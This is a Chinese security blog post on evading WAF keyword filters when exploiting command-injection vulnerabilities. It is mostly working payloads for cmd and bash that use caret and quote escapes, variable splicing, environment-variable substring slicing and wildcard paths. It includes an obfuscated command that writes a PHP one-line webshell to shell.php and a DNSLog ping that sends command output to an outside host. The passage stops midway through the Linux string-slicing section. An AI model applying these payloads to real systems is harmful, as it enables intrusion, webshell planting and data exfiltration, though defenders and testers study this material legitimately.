<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="绕过 WAF 运行命令执行漏洞的方法, 让我再浪一会">
    <meta name="description" content="绕过 WAF 运行命令执行漏洞的方法">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>绕过 WAF 运行命令执行漏洞的方法 | 让我再浪一会</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">让我再浪一会</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">让我再浪一会</div>
        <div class="logo-desc">
            
            让我再浪一会
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/17.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">绕过 WAF 运行命令执行漏洞的方法</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Rce-Trick/">
                                <span class="chip bg-color">Rce Trick</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Trick/" class="post-category">
                                Trick
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-01-28
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.7k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    11 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.min.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="绕过-WAF-运行命令执行漏洞的方法"><a href="#绕过-WAF-运行命令执行漏洞的方法" class="headerlink" title="绕过 WAF 运行命令执行漏洞的方法"></a>绕过 WAF 运行命令执行漏洞的方法</h1><h2 id="0x01-Windows"><a href="#0x01-Windows" class="headerlink" title="0x01 Windows"></a>0x01 Windows</h2><h3 id="1-1-符号和命令的关系"><a href="#1-1-符号和命令的关系" class="headerlink" title="1.1 符号和命令的关系"></a>1.1 符号和命令的关系</h3><p>如果命令执行的时候遇到拦截命令关键词的时候可以利用如下方法绕过：</p>
<p>“ 和 ^ 是CMD命令中最常见的转义字符，还有成对的括号并不会影响命令的执行。</p>
<p>这里有几个需要注意的地方：</p>
<pre class="line-numbers language-none"><code class="language-none">在命令中可以有无数个"，但是不能有两个连续的^
在命令中如果"在^之前，则"的个数必须为偶数个
在命令中如果"在^之后，并且带有参数，则命令中的"个数必须为偶数
在命令的参数中，单个字符前后"的个数只能有一个或者两个
如果成对的括号中间有"则"的个数也必须为偶数<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>示例</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">whoami</span>    //正确执行
WhOAmi    //正确执行
Who<span class="token string">"amI    //正确执行
((Who"</span>amI<span class="token punctuation">))</span>    //错误
<span class="token variable"><span class="token punctuation">((</span>Who""amI<span class="token punctuation">))</span></span>    //正确执行
Who<span class="token string">""</span>"<span class="token string">""</span>"<span class="token string">""</span>amI    //正确执行
<span class="token function">who</span><span class="token string">""</span>"a^mi    //错误
<span class="token function">who</span><span class="token string">""</span>"<span class="token string">"a^mi    //正确执行
whoa^m"</span>"<span class="token string">""</span>i    //正确执行
whoa^m<span class="token string">""</span>"i    //正确执行
whoa^^mi    //错误
n^e^t user    //正确执行
n^e^t<span class="token string">""</span> user    //正确执行
n^e^t<span class="token string">""</span>" user    //错误
n^e^t<span class="token string">""</span> u<span class="token string">"ser    //正确执行
n^e^t"</span>" u<span class="token string">""</span>ser    //正确执行
n^e^t<span class="token string">""</span> u<span class="token string">""</span>"ser    //错误
n^e^t<span class="token string">""</span> u<span class="token string">""</span>s<span class="token string">"er    //正确执行
n^e^t"</span>" u<span class="token string">""</span>s<span class="token string">""</span>er    //正确执行
n^e^t<span class="token string">""</span> u<span class="token string">""</span>s<span class="token string">""</span>"er    //错误<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="1-2-了解-set-命令和-Windows-变量"><a href="#1-2-了解-set-命令和-Windows-变量" class="headerlink" title="1.2 了解 set 命令和 Windows 变量"></a>1.2 了解 set 命令和 Windows 变量</h3><p>在cmd中set用来进行变量赋值，而 %% 括起来的变量会引用其赋的值。</p>
<pre class="line-numbers language-none"><code class="language-none">set a=1

echo %a%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031172832.png"></p>
<p>这样就可以进行命令执行了</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd</span><span class="token operator">=</span><span class="token string">"whoami"</span>

%cmd%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031172940.png"></p>
<p>也可以赋值多个变量，拼接利用</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd1</span><span class="token operator">=</span>who

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd2</span><span class="token operator">=</span>am

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd3</span><span class="token operator">=</span>i

%cmd1%%cmd2%%cmd3%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031173129.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd1</span><span class="token operator">=</span>who

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd3</span><span class="token operator">=</span>i

%cmd1%am%cmd3%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031173640.png"></p>
<p>也可以在其中加入转义符</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd1</span><span class="token operator">=</span>wh<span class="token string">""</span>o

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd3</span><span class="token operator">=</span>i<span class="token string">""</span>"

%cmd1%a^m%cmd3%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031174215.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd1</span><span class="token operator">=</span>s<span class="token string">""</span>er

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd2</span><span class="token operator">=</span>t u

<span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd3</span><span class="token operator">=</span>n^e

%cmd3%%cmd2%%cmd1%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031174257.png"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">cmd /C <span class="token string">"set cmd1=s"</span>"er<span class="token operator">&amp;&amp;</span> <span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd2</span><span class="token operator">=</span>t u<span class="token operator">&amp;&amp;</span> <span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd3</span><span class="token operator">=</span>n^e<span class="token operator">&amp;&amp;</span> call %cmd3%%cmd2%%cmd1%"<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221031175151.png"></p>
<p>当使用cmd /V:ON或cmd /V:O时可以不使用call命令来扩展变量，使用 %var% 或 !var! 来扩展变量，!var!可以用来代替%var%</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">cmd /V:ON /C <span class="token string">"set cmd=whoami &amp;&amp; !cmd!"</span>

cmd /V:O /C <span class="token string">"set cmd=whoami &amp;&amp; !cmd!"</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101153415.png"></p>
<h3 id="1-3-Windows-切割字符串"><a href="#1-3-Windows-切割字符串" class="headerlink" title="1.3 Windows 切割字符串"></a>1.3 Windows 切割字符串</h3><p>拿 whoami 举例，实践 Windows 切割字符串的语法</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">cmd</span><span class="token operator">=</span>whoami

<span class="token builtin class-name">echo</span> %cmd:~0% //取出a的值中的所有字符此时正常执行whoami

<span class="token builtin class-name">echo</span> %cmd:~0,1% //取出a的值，从第0个位置开始，取1个值此时因为w总共就1个字符

<span class="token builtin class-name">echo</span> %cmd:~0,6% //取出a的值，从第0个位置开始，取6个值此时因为whoami总共就6个字符<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101153625.png"></p>
<p>由此可以看出来截取字符串的语法为%变量名:~x,y%即从变量第x位开始，截取y个字符。</p>
<p>既然已经熟悉了如何切割字符，那么我们来看一下都有什么环境变量可以用</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101154620.png"></p>
<p>拼接成 whoami</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> %ComSpec:~3,1%%Path:~20,1%%ALLUSERSPROFILE:~5,1%%DriverData:~-1,1%%TMP:~-2,1%%APPDATA:~-3,1%

%ComSpec:~3,1%%Path:~20,1%%ALLUSERSPROFILE:~5,1%%DriverData:~-1,1%%TMP:~-2,1%%APPDATA:~-3,1%<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101155228.png"></p>
<p>我们还可以凑php一句话（这里为了方便所以自定义了一些字符）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">set</span> <span class="token assign-left variable">web</span><span class="token operator">=</span>^<span class="token operator">&lt;</span>^<span class="token operator">&gt;</span>/@<span class="token variable">$_PHPOST</span><span class="token punctuation">[</span><span class="token punctuation">]</span>?'e<span class="token punctuation">(</span><span class="token punctuation">)</span>val

<span class="token builtin class-name">echo</span> ^%web:~0,1%^%web:~-8,1%%web:~6,3% ^%web:~-6,1%^%web:~-3,3%^%web:~-5,1%%web:~4,2%%web:~8,5%^%web:~-7,1%%web:~-1,1%^%web:~-7,1%%web:~13,1%^%web:~-4,1% ^%web:~-8,1%^%web:~1,1% <span class="token operator">&gt;</span> shell.php

<span class="token builtin class-name">type</span> shell.php<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101155504.png"></p>
<p>因为拼接字符需要得到大量的位置，为了方便拼接可以使用 for 命令来讲所有位置设成一个列表，以此循环遍历列表，合并字符串，还能起到混淆的作用。</p>
<p>这里注意 set 不能以空格结尾否则，变量会将空格进行赋值</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">cmd /V:ON /C <span class="token string">" set kpx=vwchdoaadmei&amp;&amp; for %G in (1,3,5,7,9,11,26) do set lq=!lq!!kpx:~%G,1!&amp;&amp; if %G==26 !lq:~4!"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101190628.png"></p>
<h3 id="1-4-逻辑运算符在绕过中的作用"><a href="#1-4-逻辑运算符在绕过中的作用" class="headerlink" title="1.4 逻辑运算符在绕过中的作用"></a>1.4 逻辑运算符在绕过中的作用</h3><p>==|== 在cmd中，可以连接命令，且只会回显后面的命令</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">whoami</span> <span class="token operator">|</span> <span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> www.baidu.com   //只回显ping

<span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> www.baidu.com <span class="token operator">|</span> <span class="token function">whoami</span>   //只回显whoami<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101193429.png"></p>
<p>==||== 只有在前面命令失败才执行后面</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> www.baidu.com <span class="token operator">||</span> <span class="token function">whoami</span> //不执行whoami

<span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> xxx <span class="token operator">||</span> <span class="token function">whoami</span> //执行whoami<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101193807.png"></p>
<p>==&amp;== 无论前面的命令是否能执行成功都会执行后面的命令</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> www.baidu.com <span class="token operator">&amp;</span> <span class="token function">whoami</span> //执行whoami

<span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> xxx <span class="token operator">&amp;</span> <span class="token function">whoami</span> //执行whoami<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101193922.png"></p>
<p>==&amp;&amp;== 前面命令为真才会执行后面的命令。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> www.baidu.com <span class="token operator">&amp;&amp;</span> <span class="token function">whoami</span> //执行whoami

<span class="token function">ping</span> <span class="token parameter variable">-n</span> <span class="token number">1</span> xxx <span class="token operator">&amp;&amp;</span> <span class="token function">whoami</span> //不执行whoami<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101194015.png"></p>
<h2 id="0x02-Linux（区分大小写）"><a href="#0x02-Linux（区分大小写）" class="headerlink" title="0x02 Linux（区分大小写）"></a>0x02 Linux（区分大小写）</h2><h3 id="2-1-linux下的符号和逻辑运算符"><a href="#2-1-linux下的符号和逻辑运算符" class="headerlink" title="2.1 linux下的符号和逻辑运算符"></a>2.1 linux下的符号和逻辑运算符</h3><p>linux中变量使用 ==$== 来引用，==;== 表示命令结束无论命令是否执行成功都会执行下一个命令，==| || &amp; &amp;&amp;== ，与Windows一样，这里就不做赘述。</p>
<p>利用上面的符号可以进行拼接的命令：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">t</span><span class="token operator">=</span>l<span class="token punctuation">;</span><span class="token assign-left variable">j</span><span class="token operator">=</span>s<span class="token punctuation">;</span><span class="token assign-left variable">i</span><span class="token operator">=</span><span class="token string">" -al"</span><span class="token punctuation">;</span><span class="token variable">$t</span><span class="token variable">$j</span><span class="token variable">$i</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/../../../../pic/Pasted%20image%2020221101194357.png"></p>
<h3 id="2-2-利用未被过滤的命令"><a href="#2-2-利用未被过滤的命令" class="headerlink" title="2.2 利用未被过滤的命令"></a>2.2 利用未被过滤的命令</h3><p>假设有命令执行漏洞的网站中过滤的一些命令，但是没有过滤一些命令，例如 ping 命令，则可以利用 ping 命令来执行命令带出信息。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">ping</span> <span class="token variable"><span class="token variable">`</span><span class="token function">whoami</span><span class="token variable">`</span></span>.whjtmh.dnslog.cn<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>利用DNSLog就可以获得带出的信息（对于不回显的命令执行也可以利用这种方法）</p>
<p><img src="/../../../../pic/Pasted%20image%2020221101195233.png"></p>
<h3 id="2-3-linux-符号之间的组合"><a href="#2-3-linux-符号之间的组合" class="headerlink" title="2.3 linux 符号之间的组合"></a>2.3 linux 符号之间的组合</h3><p>类似于Windows的”和^linux也有类似的使用方法，就是利用变量和参数</p>
<p>利用反斜杠绕过</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">who<span class="token punctuation">\</span>ami<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>利用括号括起来（当做命令执行）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">(</span>whoa<span class="token string">''</span>mi<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>利用反引号或$和括号结合（将括号内命令的结果当做命令执行）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token variable"><span class="token variable">`</span><span class="token punctuation">(</span>echo <span class="token function">whoami</span><span class="token punctuation">)</span><span class="token variable">`</span></span>
<span class="token variable"><span class="token variable">$(</span><span class="token builtin class-name">echo</span> <span class="token function">whoami</span><span class="token variable">)</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>利用Shell特殊变量绕过</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token function">who</span><span class="token variable">$*</span>ami
<span class="token function">who</span><span class="token variable">$@</span>ami
<span class="token function">who</span><span class="token variable">$1ami</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>利用通配符匹配唯一命令名称执行命令（使用命令的绝对路径）</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">/u?r/b?n/who?mi
/*/*/whoam?
/*/*i<span class="token punctuation">[</span>n<span class="token punctuation">]</span>/wh??mi<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>综合组合</p>
<pre class="line-numbers language-none"><code class="language-none">/*/*""in/w'h'`@`??m$(@)i // 匹配到 /usr/bin/whoami<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="2-4-linux-切割字符串（linux-区分大小写）"><a href="#2-4-linux-切割字符串（linux-区分大小写）" class="headerlink" title="2.4 linux 切割字符串（linux 区分大小写）"></a>2.4 linux 切割字符串（linux 区分大小写）</h3><p>在 linux 中切割字符串的语法是 ${NAME:start:length}</p>
<p><strong>第一种使用cut：</strong></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> -d<span class="token string">" "</span> <span class="token parameter variable">-f1</span> 
<span class="token comment">#hello</span>
<span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> -d<span class="token string">" "</span> <span class="token parameter variable">-f2</span>
<span class="token comment">#world</span>
<span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> -d<span class="token string">" "</span> -f1-
<span class="token comment">#hello world</span>
 
<span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> <span class="token parameter variable">-c</span> <span class="token number">1</span>
<span class="token comment">#h</span>
<span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> <span class="token parameter variable">-c</span> <span class="token number">1</span>-4
<span class="token comment">#hell</span>
<span class="token builtin class-name">echo</span> <span class="token string">"hello world"</span> <span class="token operator">|</span><span class="token function">cut</span> <span class="token parameter variable">-c</span> <span class="token number">1,2</span>,5
<span class="token comment">#heo</span>
 
<span class="token builtin class-name">echo</span> <span class="token string">"测试字符串"</span> <span class="token operator">|</span><span class="token function">cut</span> <span class="token parameter variable">-bn</span> <span class="token number">1</span>
<span class="token comment">#测</span>
<span class="token builtin class-name">echo</span> <span class="token string">"测试字符串"</span> <span class="token operator">|</span><span class="token function">cut</span> <span class="token parameter variable">-bn</span> <span class="token number">1</span>-
<span class="token comment">#测试字符串</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>-d 表示分割的字符，这里只能使用单字符，比较有局限性。与-f 配合使用</p>
<p>-c 表示以字符分割，1表示获取第一个字符，1-4,表示获取1到4的字符，1-表示获取第一个字符以及后边所有的字符</p>
<p>-b 表示以字节分割，和-c的用法相同，但是是以一字节（8bit）分割，如果是中文，则可能出现乱码。一般与n配置使用，表示不允许将多字节的字符按字节分开</p>
<p>-f 表示输出的字段（域）（从1开始计数），1表示输出分割后的第一个字段 1-表示输出字段1以及后边的所有字段</p>
<p><strong>第二种办法 shell变量中切割字符串：</strong></p>
<p>1.获取字符串的长度</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"hello world"</span>
<span class="token variable">${<span class="token operator">#</span>string}</span> <span class="token comment"># 11</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>2.删除从左边开始到指定字符第一次出现的字符并保留右边字符</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">string</span><span class="token operator">=</span><span class="token string">"http://www.test.com"</span>
<span class="token builtin class-name">echo</span> <span class="token variable">${string<span class="token operator">#</span>*<span class="token operator">/</span><span class="token operator">/</span>}</span> <span class="token comment"># www.test.com</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

